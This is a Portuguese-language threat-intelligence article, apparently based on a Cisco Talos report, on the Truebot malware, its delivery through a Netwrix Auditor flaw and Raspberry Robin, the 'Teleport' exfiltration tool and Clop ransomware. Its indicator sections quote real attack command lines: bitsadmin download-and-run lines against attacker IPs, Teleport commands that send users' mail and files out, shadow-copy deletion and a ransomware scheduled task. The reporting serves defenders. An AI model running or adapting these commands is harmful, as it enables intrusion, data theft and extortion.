Desde agosto de 2022, a equipe de profissionais do Cisco Talos Intelligence, um dos maiores grupos de treat intelligence do mundo, observa um aumento nas infecções do malware Truebot (também conhecido como Silence.Downloader). O Truebot foi identificado pela primeira vez em 2017 e os pesquisadores o vincularam a um agente de ameaças chamado Silence Group, responsável por vários ataques de alto impacto a instituições financeiras em vários países ao redor do mundo.
Há alegações de outros pesquisadores de que esse grupo está associado ao conhecido agente de ameaças TA505 (também conhecido como Evil Corp). A pesquisa feita pelo Talos descobriu que um dos novos payloads subsequentes do Truebot é o malware Grace (também conhecido como FlawedGrace e GraceWire), atribuído ao TA505.
Recentemente, os invasores deixaram de usar e-mails maliciosos como método de entrega principal. Em agosto, o Cisco Talos registrou um pequeno número de ataques que exploraram uma recente vulnerabilidade de execução remota de código no auditor Netwrix. Em outubro, um número maior de infecções utilizou o Raspberry Robin, um malware também recente espalhado por drives USB, como um vetor de entrega. “Acreditamos com confiança moderada que, em novembro, os invasores começaram a usar outra maneira de distribuir o malware”, registra o relatório do Cisco Talos.
A atividade pós-comprometimento incluiu roubo de dados e a execução do ransomware Clop. Ao investigar um desses ataques, foi descoberto o que parece ser uma ferramenta de exportação de dados personalizada com todos os recursos, o que foi chamado de “Teleport”, que foi amplamente usada para roubar informações durante o ataque.
Até agora, foram identificadas duas botnets Truebot diferentes. O ‘One’, que é distribuído em todo o mundo, mas com foco particular no México, Paquistão e Brasil. A segunda botnet, mais recente, parece estar focada nos EUA. Embora não existam informações suficientes para dizer que há um foco específico em um setor, o grupo de treat intelligence nota várias organizações do setor educacional comprometidas.
Novos vetores de ataque
Em agosto, foram registrados um pequeno número de casos em que o Truebot foi executado após a exploração de uma vulnerabilidade no Netwrix Auditor, uma ferramenta de gerenciamento de ativos de TI.
O Cisco Talos acredita que o Truebot foi usado como vetor de entrada em algumas organizações comprometidas. No entanto, ressalta que, devido à reduzida exposição deste produto diretamente na internet, é improvável que os invasores tenham conseguido comprometer um grande número de sistemas desta forma.
Mais tarde, no início de outubro, começou-se a ver um aumento maior nas infecções Truebot, uma vez que ele passou a ser entregue pelo malware Raspberry Robin. Isto também foi percebido por outras empresas, como a Microsoft, que escreveu uma postagem de blog focada nas conexões do Raspberry Robin a um ecossistema maior que incluía o Truebot como uma das cargas úteis.
Segundo o Cisco Talos, é alta a possibilidade de estes dois vetores, principalmente a entrega do Raspberry Robin, levarem à criação de uma botnet de mais de 1.000 sistemas distribuídos em todo o mundo, mas com foco particular no México, Brasil e Paquistão, como pode ser visto na imagem a seguir.
Em novembro, começamos a ver uma nova botnet sendo criada. A imagem a seguir mostra a evolução das infecções nessa botnet, com base na telemetria openDNS:
Enquanto as vítimas do primeiro botnet eram principalmente sistemas de desktop não acessíveis diretamente pela Internet, este segundo botnet é quase exclusivamente composto por servidores Windows, conectados diretamente à Internet e expondo vários serviços do sistema operacional, como SMB, RDP e WinRM, mas curiosamente não Netwrix. Isso sugere que os invasores estão usando outro mecanismo de distribuição, embora o vetor de ataque ainda não tenha sido identificado, indica o relatório.
Esta nova botnet, com mais de 500 infecções no momento da redação de relatório, parece estar focada nos EUA (cerca de 75% das infecções), segundo texto. A imagem a seguir mostra a distribuição geográfica da infecção.
Entrega baseada na vulnerabilidade Netwrix (CVE-2022-31199)
Entre meados de agosto e setembro, foi observado um pequeno número de eventos em que comandos suspeitos foram executados por um processo chamado UAVRServer.exe. Este processo desencadeou a execução de bitsadmin para baixar e executar um binário. Pesquisas posteriores revelaram que esta era uma versão atualizada do Truebot.
Veja a seguir um exemplo de um desses comandos executados pelo processo UAVRServer.exe:
C:\\Windows\\System32\\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\\ProgramData\\msruntime.dll&rundll32 /S c:\\ProgramData\\msruntime.dll,fff&del c:\\ProgramData\\msruntime.dll
Embora o Cisco Talos não tenha conseguido coletar o código de exploração, o grupo de treat intelligence afirma que, como vários destes eventos ocorreram no mesmo período em organizações não relacionadas, é alta a crença de que estes eventos são resultado da exploração de uma vulnerabilidade no Netwrix Auditor (CVE-2022-31199), divulgada em julho de 2022.
O Netwrix Auditor é uma ferramenta de auditoria usada para avaliar a conformidade com a segurança e outras melhores práticas de ativos de TI e, de acordo com o documento de divulgação de vulnerabilidade: “Netwrix Auditor é vulnerável a um problema de desserialização de objeto inseguro causado por um serviço remoto .NET não seguro. Um invasor pode enviar objetos arbitrários ao aplicativo por meio deste serviço para obter a execução remota de código nos servidores Netwrix Auditor.”
No entanto, o serviço remoto .NET vulnerável normalmente não seria exposto à Internet, o que pode explicar por que apenas um pequeno número desses ataques foi registrado. Segundo o relatório, é possível confirmar que pelo menos um dos sistemas explorados foi exposto diretamente à Internet com proteção mínima ou nenhuma de firewall e “acreditamos com grande confiança que esta exploração foi o vetor de entrada para um ataque que incluiu outras atividades pós-compromisso’, registra o relatório.
De acordo com o documento de divulgação da vulnerabilidade: “Como esse serviço é normalmente executado com privilégios extensos em um ambiente do Active Directory, o invasor provavelmente seria capaz de comprometer o domínio do Active Directory”.
Isso significa que explorar a vulnerabilidade é efetivamente um caminho rápido para comprometer todo o domínio de uma organização. Isso também significa que esta falha provavelmente será explorada em organizações que já estão comprometidas para obter direitos administrativos sem levantar nenhuma bandeira vermelha.
Esta vulnerabilidade foi publicada apenas algumas semanas antes dos ataques, e espera-se que o número de sistemas expostos pela Internet seja bem pequeno. Isto sugere que os invasores não estão apenas atentos a novos vetores de infecção, mas também são capazes de testá-los rapidamente e incorporá-los em seu fluxo de trabalho.
Entrega de Framboesa Robin
Mais recentemente, desde o início de outubro, passou-se a observar um número maior de sistemas infectados com Truebot. Esse período correspondeu a uma nova pesquisa que descobriu que muitos destes sistemas já tinham sido infectados anteriormente por Raspberry Robin, que estavam entregando o Truebot.
Isto foi documentado pela Microsoft em um blog detalhando como o Raspberry Robin faz parte de um ecossistema criminoso maior e recentemente começou a fornecer algumas outras famílias de malware, incluindo FakeUpdates, IcedID, Bumblebee e Truebot.
A telemetria do Cisco Talos observou várias ocorrências de Raspberry Robin entregando Truebot. A imagem a seguir ilustra a sequência de ataque.
O sistema foi infectado com Raspberry Robin através de um dispositivo USB e, poucos minutos depois, o processo malicioso baixou o arquivo Truebot .dll e o executou usando o rundll32.exe.
Em outros casos, a infecção do Raspberry Robin que transmitiu o Truebot já estava presente há algum tempo.
Nova versão Truebot
Truebot é um malware de downloader. Como tal, seu principal objetivo é infectar sistemas, coletar informações para ajudar na triagem de alvos interessantes e implantar cargas adicionais. Depois que um sistema é infectado, o malware coleta informações e as envia para o comando e controle do invasor (C2). Esta versão coleta informações adicionais: uma captura de tela, o nome do computador, o nome da rede local e as relações de confiança do Active Directory.
Estas informações coletadas indicam o que os invasores estão procurando. As relações de confiança do Active Directory permitem que as organizações compartilhem usuários e recursos entre domínios. Alguns casos de uso incluem extranets, conexão de provedores de serviços ou até mesmo fusões e aquisições.
Isso sugere que os invasores têm como alvo grandes organizações, nas quais estas relações são mais comumente implantadas. Além de ser um ótimo indicador, um exemplo em que estas informações poderiam ser úteis seria encontrar uma rede mal protegida (por exemplo, a aquisição de uma empresa) que forneceria uma rota de entrada para uma rede mais segura.
Como uma ferramenta de download, também existem alguns recursos que não estavam presentes nas versões documentadas anteriormente do malware. Além de baixar e executar arquivos, o malware agora é capaz de carregar e executar módulos adicionais e shellcodes na memória, tornando as cargas menos prováveis de serem detectadas.
Conforme ilustrado na imagem acima, o comando “404NOTFOUND” é utilizado para não emitir qualquer comando. O “KLL | KLLSELF” faz com que o bot seja desinstalado e, se a resposta contiver um URL HTTP seguido por um “| <action>”, ele executa uma das seguintes ações:
|EXE – Baixe e execute o arquivo .exe
|DLL – Baixe e execute o arquivo .dll
|PS1 – Baixe e execute o arquivo .ps1
|BAT – Baixe e execute o arquivo .bat
|DNM – Baixe e execute .dll na memória
|SCH – Baixe e execute o shellcode
|S64 – Baixe e execute shellcode de 64 bits
O protocolo de comunicação mudou ligeiramente para incluir os novos recursos. Em resumo, a comunicação HTTP inclui novos campos para incluir o nome da rede e dados de relações de confiança e é enviada como uma solicitação POST com um parâmetro “q=<dados codificados em base64>”. Os detalhes restantes do protocolo e o mecanismo de criptografia parecem permanecer inalterados, como foi documentado anteriormente.
Atividade pós-compromisso
Após o comprometimento, foram encontradas duas cargas entregues por Truebot, Cobal• Malware Strike e Grace. E o que parece ser uma ferramenta personalizada de exfiltração de dados que foi amplamente usada pelos invasores para roubar informações da rede.
Graça e Golpe de Cobalto
Depois que os sistemas foram comprometidos com o Truebot, os invasores fazem a triagem do que parecem ser sistemas interessantes para uma análise mais aprofundada e implantam malware adicional para auxiliar esta análise.
Neste caso, os payloads encontrados foram versões de 32 e 64 bits do shellcode reverso do Cobalt Strike, Cobalt Strike fornecido por meio de reflexão do PowerShell e um carregador de shellcode Grace contendo um empacotador complexo que continha o malware Grace. Este empacotador, chamado de “GraceWrapper” por Outpost24, foi extensivamente documentado em uma postagem de blog recente, com base em amostras de um ataque documentado pela Proofpoint, no final de 2021, onde a nova versão do Grace foi detectada.
Depois de descompactá-lo, a equipe Talos conseguiu obter um binário Grace, facilmente identificável por uma string na memória, bem como pelos nomes de classe C++ deixados no binário.
Encontrar Grace como uma carga útil é interessante, pois é conhecido por ser usado quase exclusivamente pelo TA505, o que fortalece ainda mais as reivindicações anteriores de uma conexão entre Silence Group e TA505 feita pelo Group-IB, que foi baseada na comparação do código-fonte com FlawedAmmyy; e pela Deutsche Telekom, identificando diferentes malwares empacotados com pelo TA505.
Ferramenta de exfiltração “Teleport”
Depois de descartar uma das cargas úteis descritas, o fluxo de ataque pós-compromisso é semelhante ao de outros ataques operados por humanos. No entanto, durante a investigação, foi detectado um conjunto de comandos para exfiltrar dados roubados que faziam uso de uma ferramenta que desconhecíamos.
Depois de examinar o binário, descobriu-se o que parece ser uma ferramenta personalizada de exfiltração de dados construída em C++ e contendo vários recursos que tornam o processo de exfiltração de dados mais fácil e discreto. Estamos chamando de “Teleport” com base na chave de criptografia de comunicação codificada no binário.
Usage: tool.exe /RH:str /RP:int [/RS:int] [/P:str] [/D:str] [/DS:str] [/M:str] [/MX:str] [/SL:int] [/SU:int] [/CS:str] [/CU:str] [/MS:str] [/MU:str] [/E] [/K] [/Q] /RH:str — Server host name to upload to /RP:int — Server port number to upload to /RS:int — Upload speed (in kilobytes per second) /P:str — Directory prefix /D:str — Directory to download from (recursive search) /DS:str — Directory to download from (non-recursive search) /M:str — File mask (default is *.*) /MX:str — File mask to exclude /SL:int — Lower size limit (in bytes) /SU:int — Upper size limit (in bytes) /CS:str — Creation date since (DDMMYYYY) /CU:str — Creation date until (DDMMYYYY) /MS:str — Modified date since (DDMMYYYY) /MU:str — Modified date until (DDMMYYYY) /E — Prescan mode (cache files before sending) /K — Remove itself after execution /Q — Quiet mode (don’t show messages) Either /D or /DS must be specified. Flags /M, /MX, /D and /DS may be used more than once.
Observando a lista de recursos, é possível concluir que, embora não seja malicioso em si, ele possui alguns recursos incomuns em ferramentas de cópia remota que são úteis para um invasor exfiltrar dados durante um ataque:
- Limitar a velocidade de upload, o que pode fazer com que a transmissão não seja detectada por ferramentas que monitoram a grande exfiltração de dados. Isso pode evitar tornar a rede lenta devido à atividade de cópia de arquivos.
- A comunicação é criptografada com um protocolo personalizado para ocultar quais informações estão sendo transmitidas.
- Limitar o tamanho do arquivo, o que pode maximizar o número de arquivos roubados, evitando cópias demoradas de arquivos que podem não ser interessantes.
- A capacidade de se deletar após o uso, o que é ideal para mantê-lo o mais desconhecido possível.
Ao testar o Teleport, vimos que os dados não estavam em texto não criptografado. Uma análise mais aprofundada revelou que ele usa um protocolo de comunicação personalizado que criptografa dados usando AES e uma chave codificada. A engenharia reversa revelou a seguinte estrutura de protocolo que envolve as mensagens com uma camada de criptografia.
A maioria das mensagens enviadas pela ferramenta para seu servidor começa com um identificador de tipo de mensagem, seguido pelo tamanho da carga útil restante, dos quais os primeiros quatro bytes são uma verificação CRC32 para garantir a integridade da mensagem, os próximos 16 bytes são uma vetor de inicialização aleatória. e os bytes restantes são o conteúdo da carga criptografada usando o algoritmo AES/CBC/Nopadding.
O uso de uma ferramenta de exfiltração de dados personalizada é curioso. Por que um invasor desenvolveria tal ferramenta quando há tantas soluções diferentes de cópia de arquivos? Existem algumas razões possíveis.
Por exemplo, torna mais rápido o processo de roubo de informações interessantes de uma rede desconhecida de sistemas desconhecidos. Se observarmos seu uso durante o ataque, podemos ver que os invasores estão repetindo em um grande número de sistemas alguns comandos que os invasores sabem ter um bom potencial para coletar informações valiosas. Por exemplo:
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\onedrive
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /M:*.ost /M:*.pst /P:<remote path> /d:\\<local network host>\c$\users\<username>\appdata\local\microsoft\outlook
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\downloads
Esses comandos coletam efetivamente arquivos interessantes das pastas OneDrive e Downloads e dos e-mails do Outlook do usuário. A combinação de filtragem por extensão, tamanho e idade do arquivo permite a criação de comandos repetíveis e eficazes.
Outra razão inclui discrição. Não está na lista de arquivos comuns de cópia de arquivos, o que fornece furtividade limitada, mas também permite a limitação do uso de largura de banda e criptografia de comunicação.
O ataque Clop
Como mencionado anteriormente, um dos resultados possíveis destes ataques é a extorsão dupla usando o ransomware Clop. A equipe Talos investigou um destes ataques com mais detalhes e gerou a tabela a seguir com um resumo das técnicas usadas e organizadas pela estrutura MITRE ATT&CK.
O ataque foi, em sua essência, semelhante a muitos outros ataques de ransomware operados por humanos. Após o comprometimento, os invasores lançaram o Cobalt Strike em vários sistemas e começaram a mapear a rede e a se mover lateralmente para os sistemas de interesse.
Durante as fases de exploração e movimento lateral, os invasores navegaram pelos principais sistemas de arquivos do servidor e da área de trabalho, conectaram-se a bancos de dados SQL e coletaram dados que foram exfiltrados usando a ferramenta Teleport para um servidor controlado pelo invasor. Depois que dados suficientes foram coletados, os invasores criaram tarefas agendadas em um grande número de sistemas para iniciar simultaneamente a execução do ransomware Clop e criptografar o maior volume possível de dados.
Cobertura
As maneiras pelas quais os clientes podem detectar e bloquear essa ameaça estão listadas abaixo.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The following Snort SIDs are applicable to this threat: 60844-60845, 60948-60949, 300329
COIs
Exemplos de comando de exploração Netwrix:
C:\\Windows\\System32\\cmd.exe /c bitsadmin /transfer IVjATqWXcLnw hxxp://179[.]60[.]150[.]53:80/download/GoogleUpdate.dll c:\\ProgramData\\IVjATqWXcLnw.dll&rundll32 /S c:\\ProgramData\\IVjATqWXcLnw.dll,fff
C:\\Windows\\System32\\cmd.exe /c bitsadmin /transfer SysLog hxxp://179[.]60[.]150[.]34:80/download/file.ext c:\\ProgramData\\GUpdate.dll&rundll32 c:\\ProgramData\\GUpdate.dll,0&del c:\\ProgramData\\GUpdate.dll
C:\\Windows\\System32\\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\\ProgramData\\msruntime.dll&rundll32 /S c:\\ProgramData\\msruntime.dll,fff&del c:\\ProgramData\\msruntime.dll
Nova versão Truebot
Amostras:
092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875 1ef8cdbd3773bd82e5be25d4ba61e5e59371c6331726842107c0f1eb7d4d1f49 2d50b03a92445ba53ae147d0b97c494858c86a56fe037c44bc0edabb902420f7 55d1480cd023b74f10692c689b56e7fd6cc8139fb6322762181daead55a62b9e 58b671915e239e9682d50a026e46db0d775624a61a56199f7fd576b0cef4564d 6210a9f5a5e1dc27e68ecd61c092d2667609e318a95b5dade3c28f5634a89727 68a86858b4638b43d63e8e2aaec15a9ebd8fc14d460dd74463db42e59c4c6f89 72813522a065e106ac10aa96e835c47aa9f34e981db20fa46a8f36c4543bb85d 7a64bc69b60e3cd3fd00d4424b411394465640f499e56563447fe70579ccdd00 7c79ec3f5c1a280ffdf19d0000b4bfe458a3b9380c152c1e130a89de3fe04b63 7e39dcd15307e7de862b9b42bf556f2836bf7916faab0604a052c82c19e306ca 97d0844ce9928e32b11706e06bf2c4426204d998cb39964dd3c3de6c5223fff0 bf3c7f0ba324c96c9a9bff6cf21650a4b78edbc0076c68a9a125ebcba0e523c9 c3743a8c944f5c9b17528418bf49b153b978946838f56e5fca0a3f6914bee887 c3b3640ddf53b26f4ebd4eedf929540edb452c413ca54d0d21cc405c7263f490 c6c4f690f0d15b96034b4258bdfaf797432a3ec4f73fbc920384d27903143cb0
b95a764820e918f42b664f3c9a96141e2d7d7d228da0edf151617fabdd9166cf80b9c5ec798e7bbd71bbdfffab11653f36a7a30e51de3a72c5213eafe65965d9Download URLS:
hxxp://179[.]60[.]150[.]34:80/download/file.exthxxp://179[.]60[.]150[.]53:80/download/msruntime.dllhxxp://179[.]60[.]150[.]53:80/download/GoogleUpdate.dllhxxp://tddshht[.]com/chkds.dllC2 addresses:
hxxp://nefosferta.com/gate.phphxxp://185[.]55.[.]243[.]110/gate.phphxxp://gbpooolfhbrb[.]com/gate.phphxxp://88[.]214[.]27[.]100/gate.phphxxp://hiperfdhaus.com/gate.phphxxp://88[.]214[.]27[.]101/gate.phphxxp://jirostrogud[.]com/gate.phpFerramenta de exfiltração de dados
Amostra
dd94c2fc46a6670b4600cf439b35dc81a401b09d2c2372139afe7b754d1d24d4Graça
Exemplo (shellcode descriptografado):
27b6e71b4adeada41fb1e411a910872bfad999183d9d43ba6e63602e104d357b
C2:
45[.]227[.]253[.]102Clop ransomware
A seguir estão algumas das linhas de comando observadas durante este ataque que podem ajudar a detectar atividades maliciosas em andamento. Existem, no entanto, ferramentas e comandos benignos ou de uso duplo nesta lista. Pportanto, eles não devem ser usados como o único indicador de ataque em andamento.
adfind.exe -f &(objectcategory=computer) operatingsystem -csv
adfind -f objectcategory=person samaccountname name displayname givenname department description title mail logoncount -csv
adfind.exe -h <redacted> -f &(objectcategory=computer) operatingsystem samaccountname name displayname givenname department description title mail logoncount -csv
sqlcmd -q select name from sys.databases
sqlcmd -s <hostname> -q select name from sys.databases
sqlcmd -s <hostname> -q set nocount on; select table_name from information_schema.tables where table_type = 'base table' -h -1 -w -e -d cct_db
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\onedrive
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /M:*.ost /M:*.pst /P:<remote path> /d:\\<local network host>\c$\users\<username>\appdata\local\microsoft\outlook
<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\downloads
C:\Windows\System32\wbem\WMIC.exe shadowcopy where ID=<redacted> delete
C:\windows\WinCDropQSysvolY.exe
C:\windows\WinCDropQSysvolY.exe runrun
schtasks.exe /create /tn OneDrvTest /tr C:\windows\SysZDropQLogonQ.exe /s
<redacted> /sc onstart /ru system /f
schtasks.exe /run /tn OneDrvTest /s <redacted>
